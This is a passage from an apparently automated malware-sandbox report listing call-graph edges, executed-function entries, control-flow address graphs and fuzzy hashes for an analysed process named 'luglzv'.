dc7ea7 24079->24080 24081 dc7f8b 24080->24081 24085 50a0a6a KiUserExceptionDispatcher 24080->24085 24086 50a0a7c KiUserExceptionDispatcher 24080->24086 24082 dc8099 24081->24082 24083 50a3048 MonitorFromPoint 24081->24083 24084 50a3058 MonitorFromPoint 24081->24084 24082->23994 24083->24082 24084->24082 24085->24081 24086->24081 24088 dc7f25 24087->24088 24089 dc7f8b 24088->24089 24093 50a0a6a KiUserExceptionDispatcher 24088->24093 24094 50a0a7c KiUserExceptionDispatcher 24088->24094 24090 dc8099 24089->24090 24091 50a3048 MonitorFromPoint 24089->24091 24092 50a3058 MonitorFromPoint 24089->24092 24090->23994 24091->24090 24092->24090 24093->24089 24094->24089 24096 dc7eeb 24095->24096 24097 dc7f8b 24096->24097 24101 50a0a6a KiUserExceptionDispatcher 24096->24101 24102 50a0a7c KiUserExceptionDispatcher 24096->24102 24098 dc8099 24097->24098 24099 50a3048 MonitorFromPoint 24097->24099 24100 50a3058 MonitorFromPoint 24097->24100 24098->23994 24099->24098 24100->24098 24101->24097 24102->24097 24104 dc7e8a 24103->24104 24105 dc7f8b 24104->24105 24109 50a0a6a KiUserExceptionDispatcher 24104->24109 24110 50a0a7c KiUserExceptionDispatcher 24104->24110 24106 dc8099 24105->24106 24107 50a3048 MonitorFromPoint 24105->24107 24108 50a3058 MonitorFromPoint 24105->24108 24106->23994 24107->24106 24108->24106 24109->24105 24110->24105 24112 dc8050 24111->24112 24113 dc8099 24112->24113 24114 50a3048 MonitorFromPoint 24112->24114 24115 50a3058 MonitorFromPoint 24112->24115 24113->23994 24114->24113 24115->24113 24117 dc7e5e 24116->24117 24118 dc7f8b 24117->24118 24122 50a0a6a KiUserExceptionDispatcher 24117->24122 24123 50a0a7c KiUserExceptionDispatcher 24117->24123 24119 dc8099 24118->24119 24120 50a3048 MonitorFromPoint 24118->24120 24121 50a3058 MonitorFromPoint 24118->24121 24119->23994 24120->24119 24121->24119 24122->24118 24123->24118 24125 dc7e6d 24124->24125 24126 dc7f8b 24125->24126 24130 50a0a6a KiUserExceptionDispatcher 24125->24130 24131 50a0a7c KiUserExceptionDispatcher 24125->24131 24127 dc8099 24126->24127 24128 50a3048 MonitorFromPoint 24126->24128 24129 50a3058 MonitorFromPoint 24126->24129 24127->23994 24128->24127 24129->24127 24130->24126 24131->24126 24133 dc8034 24132->24133 24134 dc8099 24133->24134 24135 50a3048 MonitorFromPoint 24133->24135 24136 50a3058 MonitorFromPoint 24133->24136 24134->23994 24135->24134 24136->24134 24138 dc7f92 24137->24138 24139 dc8099 24138->24139 24140 50a3048 MonitorFromPoint 24138->24140 24141 50a3058 MonitorFromPoint 24138->24141 24139->23994 24140->24139 24141->24139 24143 dc7f58 24142->24143 24144 dc7f8b 24143->24144 24146 50a0a6a KiUserExceptionDispatcher 24143->24146 24147 50a0a7c KiUserExceptionDispatcher 24143->24147 24145 dc8099 24144->24145 24148 50a3048 MonitorFromPoint 24144->24148 24149 50a3058 MonitorFromPoint 24144->24149 24145->23994 24146->24144 24147->24144 24148->24145 24149->24145 24151 50a0a7d 24150->24151 24152 50a0a95 24151->24152 24153 50a0a82 KiUserExceptionDispatcher 24151->24153 24152->24034 24153->24151 24155 50a0a7d 24154->24155 24156 50a0a82 KiUserExceptionDispatcher 24155->24156 24157 50a0a95 24155->24157 24156->24155 24157->24034 24159 50a3083 24158->24159 24166 50a3e08 24159->24166 24160 50a3099 24160->24160 24163 50a3083 24162->24163 24165 50a3e08 MonitorFromPoint 24163->24165 24164 50a3099 24165->24164 24167 50a3e5b 24166->24167 24168 50a3e79 MonitorFromPoint 24167->24168 24169 50a3eaa 24167->24169 24168->24169 24169->24160 24170 50a0b20 24171 50a0b42 LdrInitializeThunk 24170->24171 24173 50a0b7c 24171->24173 24174 50a5320 24175 50a5366 KiUserCallbackDispatcher 24174->24175 24177 50a53b9 24175->24177

                                                                    Executed Functions

                                                                    Function 00DC6390 Relevance: .3, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b45b4fbf7a8c04b4643f7e851f979271aa29193ce335d5e28e9f1d3eebd9fd3
                                                                    • Instruction ID: 5420ff733e6263681d79261be565d59ff408becb512cac5e9faf8c0d99dde703
                                                                    • Opcode Fuzzy Hash: 2b45b4fbf7a8c04b4643f7e851f979271aa29193ce335d5e28e9f1d3eebd9fd3
                                                                    • Instruction Fuzzy Hash: D5B13E70E1420A8FDF14CFA9D985B9DBBF2AF88314F28812DE415E7294EB74D845CB91
                                                                    Function 00DC60FC Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 244 dc60fc-dc6194 247 dc61de-dc61e0 244->247 248 dc6196-dc61a1 244->248 249 dc61e2-dc61fa 247->249 248->247 250 dc61a3-dc61af 248->250 257 dc61fc-dc6207 249->257 258 dc6244-dc6246 249->258 251 dc61b1-dc61bb 250->251 252 dc61d2-dc61dc 250->252 253 dc61bd 251->253 254 dc61bf-dc61ce 251->254 252->249 253->254 254->254 256 dc61d0 254->256 256->252 257->258 260 dc6209-dc6215 257->260 259 dc6248-dc625a 258->259 267 dc6261-dc628d 259->267 261 dc6238-dc6242 260->261 262 dc6217-dc6221 260->262 261->259 264 dc6225-dc6234 262->264 265 dc6223 262->265 264->264 266 dc6236 264->266 265->264 266->261 268 dc6293-dc62a1 267->268 269 dc62aa-dc6307 268->269 270 dc62a3-dc62a9 268->270 277 dc6309-dc630d 269->277 278 dc6317-dc631b 269->278 270->269 277->278 279 dc630f-dc6312 call dc0c34 277->279 280 dc631d-dc6321 278->280 281 dc632b-dc632f 278->281 279->278 280->281 283 dc6323-dc6326 call dc0c34 280->283 284 dc633f-dc6343 281->284 285 dc6331-dc6335 281->285 283->281 287 dc6345-dc6349 284->287 288 dc6353 284->288 285->284 286 dc6337 285->286 286->284 287->288 290 dc634b 287->290 291 dc6354 288->291 290->288 291->291
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 99f0936579dc8a44eab581ad67839408a5df749076968550ec60a475ee3f4c89
                                                                    • Instruction ID: f7adb20a945eef4e76de3393900201270e6a2210374aa236c43675b691a5ae06
                                                                    • Opcode Fuzzy Hash: 99f0936579dc8a44eab581ad67839408a5df749076968550ec60a475ee3f4c89
                                                                    • Instruction Fuzzy Hash: F4713DB0E0025ADFDB10CFA9C945B9DBBF1EF88314F18812DE415AB254DB74D846CBA5
                                                                    Function 00DC6108 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 292 dc6108-dc6194 295 dc61de-dc61e0 292->295 296 dc6196-dc61a1 292->296 297 dc61e2-dc61fa 295->297 296->295 298 dc61a3-dc61af 296->298 305 dc61fc-dc6207 297->305 306 dc6244-dc6246 297->306 299 dc61b1-dc61bb 298->299 300 dc61d2-dc61dc 298->300 301 dc61bd 299->301 302 dc61bf-dc61ce 299->302 300->297 301->302 302->302 304 dc61d0 302->304 304->300 305->306 308 dc6209-dc6215 305->308 307 dc6248-dc628d 306->307 316 dc6293-dc62a1 307->316 309 dc6238-dc6242 308->309 310 dc6217-dc6221 308->310 309->307 312 dc6225-dc6234 310->312 313 dc6223 310->313 312->312 314 dc6236 312->314 313->312 314->309 317 dc62aa-dc6307 316->317 318 dc62a3-dc62a9 316->318 325 dc6309-dc630d 317->325 326 dc6317-dc631b 317->326 318->317 325->326 327 dc630f-dc6312 call dc0c34 325->327 328 dc631d-dc6321 326->328 329 dc632b-dc632f 326->329 327->326 328->329 331 dc6323-dc6326 call dc0c34 328->331 332 dc633f-dc6343 329->332 333 dc6331-dc6335 329->333 331->329 335 dc6345-dc6349 332->335 336 dc6353 332->336 333->332 334 dc6337 333->334 334->332 335->336 338 dc634b 335->338 339 dc6354 336->339 338->336 339->339
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \VZl$\VZl
                                                                    • API String ID: 0-3226392100
                                                                    • Opcode ID: 4ef3d2afbac284c6e60904ec4e4d88ba95a5b8131fa18618ba16cf6e32b0a50a
                                                                    • Instruction ID: f0b7e7afb849e6fc96cb3fd2a37e97d77cc78b73913165f6d9a2fb0a67b61379
                                                                    • Opcode Fuzzy Hash: 4ef3d2afbac284c6e60904ec4e4d88ba95a5b8131fa18618ba16cf6e32b0a50a
                                                                    • Instruction Fuzzy Hash: BA714DB0E0024ACFDF14CFA9C945B9DBBF2AF88314F18812DE415A7254DB74D841CBA5
                                                                    Function 00DC7020 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 340 dc7020-dc70f0 call dc0ce4 353 dc70f5-dc711c 340->353 354 dc70f2 340->354 358 dc711e 353->358 359 dc7121-dc712a 353->359 354->353 358->359 360 dc7130-dc71a6 call dc0b08 359->360 370 dc71a8 360->370 371 dc71b1-dc71e1 360->371 370->371 374 dc71af 371->374 375 dc71e3-dc71ef 371->375 374->371 377 dc71f0 375->377 377->377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq$dLlq
                                                                    • API String ID: 0-1852568965
                                                                    • Opcode ID: 92871d09ddc7f0f9b34cafe626e974e0e83b8ebf5f0d1cb1b5186a1257eae355
                                                                    • Instruction ID: 1d59d425f31ac73812e0fa3f98446b2e3c88f05b7205e465ca8fba809d792f87
                                                                    • Opcode Fuzzy Hash: 92871d09ddc7f0f9b34cafe626e974e0e83b8ebf5f0d1cb1b5186a1257eae355
                                                                    • Instruction Fuzzy Hash: A751D275B102149FCB44DF69C898A9EBBF6FF89710B2540AAE506DB3B1DA71EC01CB50
                                                                    Function 00DC6385 Relevance: .3, Instructions: 261COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8865e79424ffa497d9d621645117af35842850ea357cbe5e32fcc88277bbdf84
                                                                    • Instruction ID: 6453132756b2672828294dd562386a4099e030feb2adb4026a4da108b42313b7
                                                                    • Opcode Fuzzy Hash: 8865e79424ffa497d9d621645117af35842850ea357cbe5e32fcc88277bbdf84
                                                                    • Instruction Fuzzy Hash: 68B13E70E1420ACFDF14CFA9D985B9DBBF1AF88314F28812DE415A7294EB74D845CBA1
                                                                    Function 00DCD2E0 Relevance: .2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c6656cd652c361df330e306e7e400eaf473434d5475a96554d5949038111922
                                                                    • Instruction ID: 7fa8afb9364760027280a7f879165a2acbfaa7a101f9d79fe8fbf907be6c0391
                                                                    • Opcode Fuzzy Hash: 6c6656cd652c361df330e306e7e400eaf473434d5475a96554d5949038111922
                                                                    • Instruction Fuzzy Hash: B8518E32A1455A8BCB18DF58C980BADFBF3AF94314F69852DD546AB645C734BC80CBA0
                                                                    Function 00DCF058 Relevance: .1, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6759581a02569af1c3160f096f0f56a7153cf41a12dabf4a6cbc437b58d78d0
                                                                    • Instruction ID: 1e7f4d0af2de4e008b80e658332d5be8bad70f3e8d66d1ad0a4e895217ce23b1
                                                                    • Opcode Fuzzy Hash: e6759581a02569af1c3160f096f0f56a7153cf41a12dabf4a6cbc437b58d78d0
                                                                    • Instruction Fuzzy Hash: B6413171A00219CFCF04DFA8C991ADDB7B6FF88300B148569E805AF346DB71AD46DBA0
                                                                    Function 00DCF2C0 Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86c346757212fa2d8da22032ba6f66b4fcc0a7db0633f9ee7a24432fcdfd2646
                                                                    • Instruction ID: d08508b43346cf767b795504bd78d1558b1eda891f930448b6b649c1188f1f59
                                                                    • Opcode Fuzzy Hash: 86c346757212fa2d8da22032ba6f66b4fcc0a7db0633f9ee7a24432fcdfd2646
                                                                    • Instruction Fuzzy Hash: 6C312BB0B002069FCB04EBA8D591B9EBBF2FB88310F10852DE505EB346DB759D419BB0
                                                                    Function 00DC8120 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 26ba25f499b0d1f93a68d6048c2d84c85094f8f363e97e7e74e152865b251c36
                                                                    • Instruction ID: 55ff11cdcead306affce0a4c963ff3aa4ff911e96911103e50bbf0f504c2a6fe
                                                                    • Opcode Fuzzy Hash: 26ba25f499b0d1f93a68d6048c2d84c85094f8f363e97e7e74e152865b251c36
                                                                    • Instruction Fuzzy Hash: 5431EE78E01209DFCB05DFB4D6505AEBBB2EF89700F104569C416AB368EB355A46CF91
                                                                    Function 00DCB148 Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1f62f0b4d4a425d55e806d23f56f8a283bc3a8f36fd34abefc3fa7396b5cede6
                                                                    • Instruction ID: 1939d4fd57ab77e27474032fbe22e2340909170046ef8aeace9109d47fd9c4fe
                                                                    • Opcode Fuzzy Hash: 1f62f0b4d4a425d55e806d23f56f8a283bc3a8f36fd34abefc3fa7396b5cede6
                                                                    • Instruction Fuzzy Hash: BA313071F002059FCF14AFA5E9596AEBBF6FB88311F144029E806E7354DB399D418F64
                                                                    Function 00DC8130 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 90622269fd0e926a0c2eb36142e976204e68e51c466d4d48a0b33855f4c8030e
                                                                    • Instruction ID: c7455dce1e6d80c5dbd392dc8486d5c8d06aeefcf26129fca7ec03c5ee0b8f5e
                                                                    • Opcode Fuzzy Hash: 90622269fd0e926a0c2eb36142e976204e68e51c466d4d48a0b33855f4c8030e
                                                                    • Instruction Fuzzy Hash: 2331CC78E00209DFCB44EFB4D6905AEB7B6EF88701F104569C416AB368EB359A42CF91
                                                                    Function 00A1D4A0 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2916403794.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_a1d000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42f03cb0ab800ec00e1eb0cef70c1806d5548ca35d27acfa4973410f310b0a32
                                                                    • Instruction ID: e4db89ef82a406acb9745cad20e4fa0a1b5f13a51ab35192a33d181d506b0a57
                                                                    • Opcode Fuzzy Hash: 42f03cb0ab800ec00e1eb0cef70c1806d5548ca35d27acfa4973410f310b0a32
                                                                    • Instruction Fuzzy Hash: 0C2125B1504200EFDB15DF14D9C0B66BF66FB98328F24C569E90A0B256C336D896DBA2
                                                                    Function 00DCF209 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e9ba2a0555c622eff7a341850a4fb4a4641e01c732aca380529f44aa81231c0
                                                                    • Instruction ID: cc53ffd627200f429fd4d697b54f83553d1dd5b7c2ac5d1a6f3ae9b7f1f18bd6
                                                                    • Opcode Fuzzy Hash: 7e9ba2a0555c622eff7a341850a4fb4a4641e01c732aca380529f44aa81231c0
                                                                    • Instruction Fuzzy Hash: 1611A735B155178FCB50DBA8A9907EEB7B6EB88310B14417AC805D7249E730DE068BE5
                                                                    Function 00DCF3F8 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbf6906d7f428ea58813ae2a2dae3a1316f37650c586e0a8d3e48c6f0e9ddb08
                                                                    • Instruction ID: 335b0a5cb694f834d1c60c65ff0d802766e035d59e48a07b25bf5434e6ffa7a2
                                                                    • Opcode Fuzzy Hash: cbf6906d7f428ea58813ae2a2dae3a1316f37650c586e0a8d3e48c6f0e9ddb08
                                                                    • Instruction Fuzzy Hash: 05118F31B081168FCB50EFACA9507EE77F6EB88350B24417AC905D7249E731D9028BE1
                                                                    Function 00DC3177 Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3775e3d7efd3f385c7ab78d2d28626814df46cc6514dda3941fc0abd23c2307b
                                                                    • Instruction ID: f904e12f8a8419d626d44a48c885baf39c6a3b7058dd7c401af561eca3781649
                                                                    • Opcode Fuzzy Hash: 3775e3d7efd3f385c7ab78d2d28626814df46cc6514dda3941fc0abd23c2307b
                                                                    • Instruction Fuzzy Hash: AD219D38604255CFCF15AB74D815BAD7BB2FF8A304F14446CD006AB3A2CB768D05CB68
                                                                    Function 00DC3188 Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5ff165a0a4acf928cdd06dd43516c0ea38611eabd3510197ce3c9e8f0df6867
                                                                    • Instruction ID: a9ce2a9573f8043da05b1f448ff03b94573955231a3610f18455e737b71d97a0
                                                                    • Opcode Fuzzy Hash: a5ff165a0a4acf928cdd06dd43516c0ea38611eabd3510197ce3c9e8f0df6867
                                                                    • Instruction Fuzzy Hash: 09212178604215CFDF14ABB4C815BAE7BB2EF49705F14446CD101AB791CB758D01CBA9
                                                                    Function 00DCF048 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b800023aa5d6e4a1e3a6d498017d7bcbe75e8dcfba687f91a0879d8db9dcb9e
                                                                    • Instruction ID: 1a47bb9621f06f3126f8e304b4d362639761768cfd2686838b02bde84846fd96
                                                                    • Opcode Fuzzy Hash: 2b800023aa5d6e4a1e3a6d498017d7bcbe75e8dcfba687f91a0879d8db9dcb9e
                                                                    • Instruction Fuzzy Hash: 0101D6327006055BCB14AB68EC85B9A7BAAEBC9710F04487EE6568B345DF70A9059790
                                                                    Function 00A1D49B Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2916403794.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_a1d000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction ID: d2a47a06d57ada88107d609545dcdaf1bafb484c166ccff576060a5388e59185
                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction Fuzzy Hash: D6112672404240CFCF12CF04D5C0B56BF72FB94324F24C6A9D9090B256C33AD89ACBA2
                                                                    Function 00DC802F Relevance: .1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65cf83b7a1800b9a1666e6b6e8fcbac0515965ea7fd66ea72dbf412d04931479
                                                                    • Instruction ID: 7b4c55406b497b3a5c9b978e8efbaf592913c49cef93d9fa9309517e90180385
                                                                    • Opcode Fuzzy Hash: 65cf83b7a1800b9a1666e6b6e8fcbac0515965ea7fd66ea72dbf412d04931479
                                                                    • Instruction Fuzzy Hash: 0B119E34F592078BCB48EB64F5A8A6E7772FB85340B208915D8525B79CDE799C01AB80
                                                                    Function 00DCB0B0 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e587acbd933f02393eb8c5d2bb84cb8d8a70b839b221fc2a9e7de6c56d8ace48
                                                                    • Instruction ID: 1359c4f962d45b06b94fe5e619a3db4ab6429c790ef759e5156e0925d4f05279
                                                                    • Opcode Fuzzy Hash: e587acbd933f02393eb8c5d2bb84cb8d8a70b839b221fc2a9e7de6c56d8ace48
                                                                    • Instruction Fuzzy Hash: FD0169333141110FCB14A6BEB85466EB7DAEBC8676B14443BE50EC3399DEA6CC4547A0
                                                                    Function 00DC804B Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6c97f4f67d8c639669e362eb2e02a95cae76c58d358e430d2e785aad34f634a
                                                                    • Instruction ID: 1706205f8f9f343b6b43afea9c0590637b8c243649345e23fec34f56b2eb9530
                                                                    • Opcode Fuzzy Hash: a6c97f4f67d8c639669e362eb2e02a95cae76c58d358e430d2e785aad34f634a
                                                                    • Instruction Fuzzy Hash: A211D034F552078FCB48EB64F5A8A6E7772FB84340B108915D8525B79CDF799C01EB80
                                                                    Function 00A1D8A9 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2916403794.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_a1d000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2606df10977c76b1527c7c425e45e273faa0bb312fa83143197f0b7e5658946
                                                                    • Instruction ID: 910e092fdd48a89a9ec4ef8cf60685c554e0a695da65555c67523232ed4ff35e
                                                                    • Opcode Fuzzy Hash: c2606df10977c76b1527c7c425e45e273faa0bb312fa83143197f0b7e5658946
                                                                    • Instruction Fuzzy Hash: D8012B720043049AE7104B65DCC0BA7FFECDF41334F18C45AED094A182C7389880D7B1
                                                                    Function 00DCF2B0 Relevance: .0, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bc10f40ce90d489dcd13da5879996421ac6568c4df5c8ab56ae821a4d74664f
                                                                    • Instruction ID: a2394e482d7968a4a5dae2478bf1f80228249bf8d24ce49d803083784ae0ac61
                                                                    • Opcode Fuzzy Hash: 4bc10f40ce90d489dcd13da5879996421ac6568c4df5c8ab56ae821a4d74664f
                                                                    • Instruction Fuzzy Hash: B90162B1E0010A9FCF40DFADE4416DEBFF5EB49310B10416AD154E7200EB319945CBA5
                                                                    Function 00DCB137 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
